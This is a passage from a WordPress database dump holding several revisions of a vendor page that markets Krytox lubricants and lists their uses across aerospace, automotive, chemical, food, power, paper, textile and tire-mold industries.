been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 19:59:32', '2016-09-28 19:59:32', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2132, 2, '2016-09-28 20:00:31', '2016-09-28 20:00:31', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n<br /><br />\r\n<br /><br />\r\n<br /><br />\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<a name="Aerospace">\r\n<strong>Aerospace, Aviation, and National Defense</strong></a>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 20:00:31', '2016-09-28 20:00:31', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2133, 2, '2016-09-28 20:01:28', '2016-09-28 20:01:28', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n<br /><br />\r\n<br /><br />\r\n<br /><br />\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<a name="aerospace">\r\n<strong>Aerospace, Aviation, and National Defense</strong></a>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, 